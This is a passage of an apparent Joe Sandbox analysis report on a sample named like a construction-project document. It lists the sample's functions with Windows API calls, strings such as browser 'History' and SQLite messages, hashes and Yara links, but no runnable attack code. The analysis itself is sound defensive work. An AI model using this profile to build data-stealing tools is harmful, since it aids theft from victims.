                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                          • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                          • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                          Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                          • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                          • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsSystem$PlacementWindow
                                                                                                                          • String ID: AE
                                                                                                                          • API String ID: 3548547718-685266089
                                                                                                                          • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                          • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                          • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                          • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                          • String ID: @@@@$History
                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                          • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                          • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                          • String ID: </%s>
                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                          • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                          • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                          Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                          • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendmemset
                                                                                                                          • String ID: AE$"
                                                                                                                          • API String ID: 568519121-1989281832
                                                                                                                          • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                          • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                          • String ID: caption
                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                          • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                          • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                          • String ID: MS Sans Serif
                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                          • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                          • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                          Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                          • String ID: edit
                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                          • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                          • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                          Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3384217055-0
                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$memcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 368790112-0
                                                                                                                          • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                          • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                          Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1889144086-0
                                                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                          Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1661045500-0
                                                                                                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                          Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                          Strings
                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
